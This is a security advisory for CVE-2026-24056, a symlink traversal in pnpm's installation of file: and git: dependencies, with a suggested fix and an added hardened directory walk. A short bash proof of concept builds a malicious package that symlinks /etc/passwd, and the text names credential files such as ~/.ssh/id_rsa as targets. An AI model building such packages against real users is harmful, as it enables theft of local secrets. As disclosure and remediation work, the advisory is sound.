CVE-2026-24056

Severity: MEDIUM 6.5 | EPSS: 0.01%

pnpm has symlink traversal in file:/git dependencies

Published: 1/26/2026
Modified: 2/3/2026
Also known as: GHSA-m733-5w8f-5ggw

Description

### Summary

When pnpm installs a `file:` (directory) or `git:` dependency, it follows symlinks and reads their target contents without constraining them to the package root. A malicious package containing a symlink to an absolute path (e.g., `/etc/passwd`, `~/.ssh/id_rsa`) causes pnpm to copy that file's contents into `node_modules`, leaking local data.

**Preconditions:** Only affects `file:` and `git:` dependencies. Registry packages (npm) have symlinks stripped during publish and are NOT affected.

### Details

The vulnerability exists in `store/cafs/src/addFilesFromDir.ts`. The code uses `fs.statSync()` and `readFileSync()`, which follow symlinks by default:

```typescript
const absolutePath = path.join(dirname, relativePath)
const stat = fs.statSync(absolutePath) // Follows symlinks!
const buffer = fs.readFileSync(absolutePath) // Reads symlink TARGET
```

There is no check that `absolutePath` resolves to a location inside the package directory.

### PoC

```bash
# Create malicious package
mkdir -p /tmp/evil && cd /tmp/evil
ln -s /etc/passwd leaked-passwd.txt
echo '{"name":"evil","version":"1.0.0","files":["*.txt"]}' > package.json

# Victim installs
mkdir /tmp/victim && cd /tmp/victim
pnpm init && pnpm add file:../evil

# Leaked!
cat node_modules/evil/leaked-passwd.txt
```

### Impact

- Developers installing local/file dependencies
- CI/CD pipelines installing git dependencies
- Credential theft via symlinks to `~/.aws/credentials`, `~/.npmrc`, `~/.ssh/id_rsa`

### Suggested Fix

Use `lstatSync` to detect symlinks and reject those pointing outside the package root in `store/cafs/src/addFilesFromDir.ts`.
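The suggested fix above, worked through as an added example that is not pnpm's own code: a directory walk in the style of `addFilesFromDir` that uses `lstatSync` instead of `statSync`, resolves every symlink with `realpathSync`, and refuses any whose target falls outside the resolved package root. The function names and the fixture (a package directory with an in-root link and a link to a file outside the package) are assumptions constructed for the demo.

```typescript
// Added example, not pnpm's code: a hardened walk for the addFilesFromDir step.
// lstatSync reports symlinks instead of following them; each link is resolved with
// realpathSync and refused if its target leaves the package root, so its bytes are never read.
import * as fs from 'fs'
import * as os from 'os'
import * as path from 'path'
// True when `candidate` equals `root` or lies beneath it (both paths already resolved).
export function isInsideRoot(root: string, candidate: string): boolean {
  const rel = path.relative(root, candidate)
  return rel === '' || (rel !== '..' && !rel.startsWith('..' + path.sep) && !path.isAbsolute(rel))
}
// Returns package-relative paths that are safe to add and the entries that were refused.
export function collectPackageFiles(packageDir: string): { accepted: string[]; rejected: string[] } {
  const root = fs.realpathSync(packageDir)
  const accepted: string[] = [], rejected: string[] = []
  const walk = (dir: string): void => {
    for (const name of fs.readdirSync(dir)) {
      const absolutePath = path.join(dir, name)
      const relativePath = path.relative(root, absolutePath)
      const stat = fs.lstatSync(absolutePath) // does NOT follow symlinks
      if (stat.isSymbolicLink()) {
        let target: string | null = null
        try { target = fs.realpathSync(absolutePath) } catch { /* dangling link: target stays null */ }
        // Dangling links and links whose target escapes the root are both refused.
        if (target === null || !isInsideRoot(root, target)) rejected.push(relativePath)
        else accepted.push(relativePath) // in-root link: keep as a link, never copy target bytes
      } else if (stat.isDirectory()) {
        walk(absolutePath)
      } else if (stat.isFile()) {
        accepted.push(relativePath)
      }
    }
  }
  walk(root)
  return { accepted, rejected }
}

// Constructed fixture: a regular file, an in-root symlink, and a symlink to a file outside the package.
export function buildFixture(): string {
  const base = fs.mkdtempSync(path.join(os.tmpdir(), 'symlink-demo-'))
  const secret = path.join(base, 'secret.txt') // stands in for something like ~/.ssh/id_rsa
  fs.writeFileSync(secret, 'not-really-a-key')
  const pkg = path.join(base, 'evil')
  fs.mkdirSync(pkg)
  fs.writeFileSync(path.join(pkg, 'index.js'), 'module.exports = 1\n')
  fs.symlinkSync(path.join(pkg, 'index.js'), path.join(pkg, 'alias.js'))
  fs.symlinkSync(secret, path.join(pkg, 'leaked.txt'))
  return pkg
}
```

Running `collectPackageFiles(buildFixture())` accepts `index.js` and the in-root `alias.js` but lists `leaked.txt` as rejected, which is the outcome an install should turn into a hard error rather than a silent copy.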

Affected packages (1)

CVSS scores

| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 4.0 | | CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N |
| osv | CVSS 3.1 | MEDIUM 6.5 | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N |

References (5)